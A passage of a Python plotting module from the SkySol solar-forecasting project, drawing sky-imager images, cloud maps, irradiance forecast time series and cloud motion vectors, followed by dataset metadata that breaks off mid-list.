edgecolor='k')\n\n if hist_flag:\n ncols = 3; nrows = 3\n else:\n ncols = 3; nrows = 3\n\n\n\n st = time.time()\n\n\n # get station index\n if not ini.cbh_flag and ini.fcst_flag:\n k = [j for j in range(0, nstations) if int(pyr[j].ind) == int(ini.statlist[0])][0]\n else:\n k = 0\n\n\n\n\n # Select area to cut from image\n imgsize = in_img.orig_color.shape\n x0 = int(ini.cy-ini.fx)\n if x0 < 0: x0 = 0\n x1 = int(ini.cy+ini.fx)\n if x1 > imgsize[0]: x1 = imgsize[0]\n y0 = int(ini.cx-ini.fy)\n if y0 < 0: y0 = 0\n y1 = int(ini.cx+ini.fy)\n if y1 > imgsize[1]: y1 = imgsize[1]\n\n\n\n\n # Origin Image\n plt.subplot2grid((nrows,ncols), (0,0))\n img = in_img.orig_color_draw.copy()\n img[mask] = 0\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n #img[xsun-15:xsun+15,ysun-15:ysun+15,:] = 0 # mark sun position\n img = img[x0:x1,y0:y1]\n img = rotate(img,-np.degrees(ini.rot_angles[2]))\n i1 = np.min(np.where(img!=0)[0])\n i2 = np.max(np.where(img!=0)[0])\n j1 = np.min(np.where(img!=0)[1])\n j2 = np.max(np.where(img!=0)[1])\n\n img = img[i1:i2,j1:j2]\n #img = np.float32(img)\n #img[img<=0]=np.nan\n\n plt.axis('off')\n plt.imshow(img)\n plt.title('Masked original image')\n del img\n\n\n\n plt.subplot2grid((nrows,ncols), (1,0))\n img = in_img.binary_color.copy()\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n img = img[x0:x1,y0:y1]\n img = rotate(img,-np.degrees(ini.rot_angles[2]))\n #img = np.float32(img)\n #img[img<=0]=np.nan\n i1 = np.min(np.where(img!=0)[0])\n i2 = np.max(np.where(img!=0)[0])\n j1 = np.min(np.where(img!=0)[1])\n j2 = np.max(np.where(img!=0)[1])\n img = img[i1:i2,j1:j2]\n plt.title('Cloud decision map')\n plt.axis('off')\n plt.imshow(img)\n\n\n\n\n\n\n ax = plt.subplot2grid((3,3), (0,1), colspan=2, rowspan=2)\n\n xvals = []; yvals = []; vals = []\n\n # Draw shadow map\n cm = plt.cm.get_cmap('jet')\n img = cv2.cvtColor(cmap,cv2.COLOR_RGB2GRAY) * 1.0\n img[cmap[:,:,2]==0] = np.nan\n img[cmap[:,:,2]==255] = 200\n img[(cmap[:,:,2]>1)&(cmap[:,:,2]<255)]=100\n\n for i in range(0, ini.fcst_horizon):\n\n x = int(pyr[k].fpos[i][1])\n y = int(pyr[k].fpos[i][0])\n if x > cmap.shape[0] - 2 or x <= 0 or y <= 0 or y > cmap.shape[1] - 2: continue\n xvals.append(x); yvals.append(y)\n vals.append(pyr[k].fghi[i])\n #if pyr[k].fghi[i] > 500:\n # cmap[x, y] = 200\n #else:\n # cmap[x, y] = 90\n ax1 = plt.scatter(xvals, yvals, s=30, vmin=0.15 * csk.actval, vmax=csk.actval + 0.15*csk.actval, marker='o', c=vals, cmap=cm, edgecolor='none')\n plot_stat(ax, ini, nstations, pyr, csk.ghi[csk.tind], k)\n arr = cv2.imread(ini.rootdir + '/config/arrow.png')\n if arr is not None:\n arr[arr==64]=255;arr[arr==68]=255;arr[arr==0]=255\n arr = cv2.cvtColor(arr, cv2.COLOR_RGB2GRAY)\n ofs = int(img.shape[0] / 150)\n arr = cv2.resize(arr,(arr.shape[0]//2,arr.shape[1]//2))\n img[ofs:ofs+arr.shape[0],ofs:ofs+arr.shape[1]] = arr\n # Title\n tit = 'Cloud base height: ' + str(params['cbh'])\n\n plt.title(tit, fontsize=12)\n ax.imshow(img,alpha=0.6,cmap=plt.cm.gray)\n\n\n # Rename ticks\n s = (ini.grid_size * ini.x_res) / 2.\n nticks = len(ax.get_xticks()) - 1\n steps = 2.*s / (nticks-1)\n new_ticks = list(map(int,np.arange(-s-steps,s+(2*steps),steps)))\n ax.xaxis.set_ticklabels(new_ticks,fontsize=10)\n ax.yaxis.set_ticklabels(new_ticks, fontsize=10)\n #ax.set_ylabel('latitudinal distance from camera [m]',fontsize=13)\n ax.set_xlabel('longitudinal distance from camera [m]',fontsize=13)\n\n\n # Draw timeseries\n ax = plt.subplot2grid((nrows,ncols), (2,0),colspan=3)\n\n maxval = 0\n\n i = 0
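\n\n # Forecast Values (pyr[k].fghi is drawn against clear-sky timestamps taken below; aside: plt.plot_date is deprecated in recent Matplotlib releases, and plain plt.plot accepts datetime x-values directly)\n x = 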
csk.time[csk.tind:csk.tind+ini.fcst_horizon]\n dates=[datetime.utcfromtimestamp(ts) for ts in x ]\n y = pyr[k].fghi[:]\n plt.plot_date(x=dates,y=y,fmt='r-',lw=2.0)\n\n if ini.radiation:\n\n # Analyses Values\n slc = slice(csk.tind-1800,csk.tind,ini.camera_res)\n x = csk.time[slc]\n dates=[datetime.utcfromtimestamp(ts) for ts in x ]\n y = pyr[k].aghi\n plt.plot_date(x=dates,y=y,fmt='gv')\n # Plot measurements\n x = pyr[k].time[ pyr[k].tind-1800:pyr[k].tind+ini.fcst_horizon]\n y = pyr[k].ghi[ pyr[k].tind-1800:pyr[k].tind+ini.fcst_horizon]\n y2 = pyr[k].dhi[ pyr[k].tind-1800:pyr[k].tind+ini.fcst_horizon]\n dates=[datetime.utcfromtimestamp(ts) for ts in x ]\n plt.plot_date(x=dates, y=y, fmt='b-',lw=2.0)\n if len(y2)>0:\n p = fill_between(dates,0,y2,alpha=0.5,linewidth=0,facecolor=\"yellow\")\n p = fill_between(dates,y2,y,alpha=0.5,linewidth=0,facecolor=\"orange\")\n\n # Clear sky irradiance\n x = csk.time[csk.tind-1800:csk.tind+ini.fcst_horizon]\n\n dates=[datetime.utcfromtimestamp(ts) for ts in x ]\n y = csk.ghi[csk.tind-1800:csk.tind+ini.fcst_horizon]\n plt.plot_date(x=dates,y=y,fmt='--',color='black')\n maxval = 1.5 * csk.actval\n\n plt.axvline(dates[1800], color='b', linestyle='--',lw=2.0)\n\n plt.xlabel('Time [UTC]',fontsize=14)\n plt.ylabel('Irradiance [W/m$^2$]',fontsize=14)\n if ini.radiation:\n plt.legend(['Forecast','Analysis','Measurement','Clear Sky'])\n else:\n plt.legend(['Forecast','Clear Sky'])\n\n plt.ylim([0,maxval])\n\n if ini.location == \"juelich\":\n plt.title('Station #' + str(pyr[k].ind) )\n ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n plt.grid('off')\n #ax.xaxis.set_major_locator(HourLocator())\n ax.xaxis_date()\n\n\n # Draw Text\n acttime = datetime.strftime(datetime.utcnow(),\"%Y-%m-%d %H:%M:%S\")\n plt.text(0.7,0.95,str(np.char.capitalize(ini.location)) + ' \\n' + \\\n actdate + str(' UTC'), weight=\"bold\")#, fontsize=22. )\n\n\n # Final settings\n fig.subplots_adjust(hspace=0.4,wspace=0.3,left=0.085, right=0.95, top=0.95, bottom=0.08)\n plt.draw()\n plt.savefig(outfile,dpi=200)\n plt.clf()\n\n\n\ndef plot_original_mod(img, outfile, mask, dt, ini, cam, title=\"Sky Imager\", **meta):\n\n from PIL import Image, ImageFont, ImageDraw\n from skysol.lib.drawings import draw_boundaries, sunpath\n\n data = img.orig_color_draw.copy()\n\n data = sunpath(data, dt, ini, cam)\n data[mask,:] = 0\n\n try:\n data = cv2.resize(data, img.segments.shape)\n data = np.array(255*draw_boundaries(data, img.segments), dtype=\"uint8\")\n data = rotate(data,-np.degrees(ini.rot_angles[2]))\n except:\n data = cv2.resize(data, (600,600))\n data = data[:,:,::-1]\n data = rotate(data,-np.degrees(ini.rot_angles[2]))\n\n i1 = np.min(np.where(data!=0)[0])\n i2 = np.max(np.where(data!=0)[0])\n j1 = np.min(np.where(data!=0)[1])\n j2 = np.max(np.where(data!=0)[1])\n data = data[i1:i2,j1:j2]\n #data = data[::-1,:,:]\n\n # PIL part\n im = Image.fromarray(data,'RGB')\n\n draw = ImageDraw.Draw(im)\n lx, ly = im.size\n\n datestr = datetime.strftime(img.locdate, \"%Y-%m-%d\")\n timestr = datetime.strftime(img.locdate, \"%H:%M:%S\")\n #txtfont = ImageFont.truetype(\"data/arial.ttf\", 22)\n draw.text((10,10), title,fill='red')\n\n #txtfont = ImageFont.truetype(\"data/arial.ttf\", 20)\n draw.text((lx-120,10), datestr,fill='red', align=\"right\")\n draw.text((lx-120,30), timestr, fill = 'red', align=\"right\")\n\n #txtfont = ImageFont.truetype(\"data/arial.ttf\", 18)\n draw.text((10,ly-60), \"Sun Elev. 
= %.1f°\" % (90-meta['sza']), fill = 'red', align=\"right\")\n draw.text((10,ly-40), \"Sun Azimuth = %.1f°\" % meta['saz'], fill = 'red', align=\"right\")\n draw.text((10,ly-20), \"Cloud Cover = %.1f%%\" % meta['cc'], fill = 'red', align=\"right\")\n\n if meta['img_qc']:\n qf = \"OK\"\n else:\n qf = \"BAD\"\n\n draw.text((lx-100,ly-60), \"QC = %s\" % qf, fill = 'red', align=\"right\")\n CC_long = ['Cumulus','Cirrus','Altocumulus','Clear Sky','Stratocumulus', 'Stratus', 'Nimbostratus']\n CC_short = ['Cu','Ci/Cs','Ac/Cc','Clear','Sc', 'St', 'Ns/Cb']\n ccstr_long = CC_long[meta['imgclass']-1]\n ccstr_short = CC_short[meta['imgclass']-1]\n if meta['imgclass'] > 0:\n cpstr = str(np.round(meta['imgprob'][meta['imgclass']-1],2))\n else:\n cpstr = \"-1\"\n draw.text((lx-120,ly-40), \"%s (%s%%)\" % (ccstr_short, cpstr), fill = 'red', align=\"right\")\n\n im.save(outfile)\n\n\n\n\ndef plot_cmv(outfile, in_img, ini, cam, cmv,\n xsun, ysun, mask, map_x, map_y, **params):\n \"\"\"\n Time for example: 2013-04-25 14:15:30\n\n Shi-Tomasi Corner Detection parameter:\n self.feature_params = dict( minDistance = 50,\n blockSize = 12)\n self.maxCorners = 500\n self.qualityLevel = 0.03\n \"\"\"\n\n plt.close('all')\n\n # Figure size\n fig = plt.figure(1,figsize=(8,8),facecolor='w', edgecolor='k')\n\n # Image Subplot order\n nrows = 2; ncols = 2\n\n # Original Image\n ax = plt.subplot2grid((nrows,ncols), (0,0))\n img = in_img.orig_color_draw.copy()\n img[cmv.cmv_mask,:] = [0,0,255]\n img[mask] = 0\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n #img = img[x0:x1,y0:y1]\n cv2.circle(img,(ysun,xsun),20,[250,200,25],-1)\n #img = rotate(img,-np.degrees(ini.rot_angles[2]))\n i1 = np.min(np.where(img!=0)[0])\n i2 = np.max(np.where(img!=0)[0])\n j1 = np.min(np.where(img!=0)[1])\n j2 = np.max(np.where(img!=0)[1])\n img = img[i1:i2,j1:j2]\n plt.axis('off')\n plt.imshow(img)\n del img\n ax.text(0.03,0.95,'Fisheye RGB Image',color=\"white\",fontweight=\"bold\",fontsize=12,transform=ax.transAxes)\n\n\n # Segmented cloud/sky image with CMV\n ax = plt.subplot2grid((nrows,ncols), (0,1))\n img = in_img.orig_gray.copy()\n img = cv2.cvtColor(img,cv2.COLOR_GRAY2BGR)\n img[cmv.cmv_mask,:] = [255,0,0]\n # Draw every 50th cloud path\n if len(cmv.x) > 0: drawings.cloud_path(img, cmv.x, cmv.y, lcolor=[25,25,125])\n img[mask] = 0\n img[in_img.mask_horizon] = 0\n cv2.circle(img,(ysun,xsun),20,[250,200,25],-1)\n #img = rotate(img,-np.degrees(ini.rot_angles[2]))\n img = img[i1:i2,j1:j2]\n plt.axis('off')\n plt.imshow(img, cmap=plt.cm.viridis)\n ax.text(0.03,0.95,'Fisheye Intensity',color=\"white\",fontweight=\"bold\",fontsize=12,transform=ax.transAxes)\n\n del img\n\n # Projected RGB with CMV\n ax = plt.subplot2grid((nrows,ncols), (1,0))\n img = in_img.orig_color_draw.copy()\n img[cmv.cmv_mask,:] = [0,0,255]\n img = cam.grid(img, map_x, map_y)\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n plt.axis('off')\n plt.imshow(img)\n ax.text(0.03,0.95,'Perspective projection RGB',color=\"white\",fontweight=\"bold\",fontsize=12,transform=ax.transAxes)\n\n # Projected binary with CMV\n ax = plt.subplot2grid((nrows,ncols), (1,1))\n img = in_img.binary_color\n img[cmv.cmv_mask,:] = [0,0,255]\n if len(cmv.x) > 0: drawings.cloud_path(img, cmv.x, cmv.y, lcolor=[25,25,125])\n img = cam.grid(img, map_x, map_y)\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n plt.axis('off')\n plt.imshow(img)\n ax.text(0.03,0.95,'Perspective projection cloud map',color=\"white\",\n fontweight=\"bold\",fontsize=12,transform=ax.transAxes)\n\n fig.text(0.5,0.5, \"#CMV %d - Direction 
%.1f° - Speed %.1f\" % (np.sum(cmv.flag),np.degrees(cmv.mean_direction), \\\n cmv.mean_speed), fontsize=15, horizontalalignment='center')\n\n\n # Final settings\n plt.tight_layout()#pad=0.5, w_pad=0.5, h_pad=0.5)\n plt.subplots_adjust(left=0.01, right=0.99, top=0.99, bottom=0.01)\n plt.draw()\n plt.savefig(outfile,dpi=100)\n plt.clf()\n plt.close('all')\n", "repo_name": "fcco/SkySol", "sub_path": "skysol/lib/visualization.py", "file_name": "visualization.py", "file_ext": "py", "file_size_in_byte": 38371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 21, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 22, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 23, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 24, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 25, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 26, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 27, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 28, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 29, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 31, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 32, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 33, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 34, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 35, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 36, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 37, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 38, "usage_type": "attribute"}, {"api_name": 
"matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 39, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 40, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 41, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "cartopy.io.img_tiles.GoogleTiles", "line_number": 51, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Rectangle", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "utm.latlon_to_zone_number", "line_number": 91, "usage_type": "call"}, {"api_name": "cartopy.crs.UTM", "line_number": 96, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "cartopy.mpl.gridliner.LONGITUDE_FORMATTER", "line_number": 181, "usage_type": "name"}, {"api_name": "cartopy.mpl.gridliner.LATITUDE_FORMATTER", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 187, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 202, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm.get_cmap", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 213, "usage_type": "attribute"}, {"api_name": 
"matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "cmocean.cm", "line_number": 214, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 229, "usage_type": "call"}, {"api_name": "skysol.lib.misc.grid2latlon", "line_number": 230, "usage_type": "call"}, {"api_name": "skysol.lib.misc", "line_number": 230, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 265, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 265, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 269, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 269, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 270, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 270, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 275, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 275, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 277, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 279, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 290, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 291, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 292, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 294, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 294, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.axvline", "line_number": 295, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 295, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "numpy.divide", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.isfinite", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 303, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 303, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 307, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 312, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 314, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 316, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 316, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.title", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 319, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 342, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 344, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 344, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.title", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 348, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 349, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 350, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 350, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 361, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 361, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 363, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 363, "usage_type": "name"}, {"api_name": 
"datetime.datetime.utcfromtimestamp", "line_number": 382, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 382, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 383, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 383, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 391, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 391, "usage_type": "name"}, {"api_name": "numpy.isnan", "line_number": 391, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 394, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 394, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 399, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 399, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 401, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 401, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 403, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 403, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 407, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 407, "usage_type": "name"}, {"api_name": "numpy.isnan", "line_number": 407, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 410, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 410, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 413, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 413, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 414, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 414, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 415, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 415, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 416, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 416, "usage_type": "name"}, {"api_name": "matplotlib.dates.DateFormatter", "line_number": 418, "usage_type": "call"}, {"api_name": "matplotlib.ticker.LinearLocator", "line_number": 419, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot2grid", "line_number": 423, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 423, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 425, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 425, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 425, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 426, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 426, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 449, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.degrees", "line_number": 457, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 472, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 472, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 473, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 473, "usage_type": "name"}, 
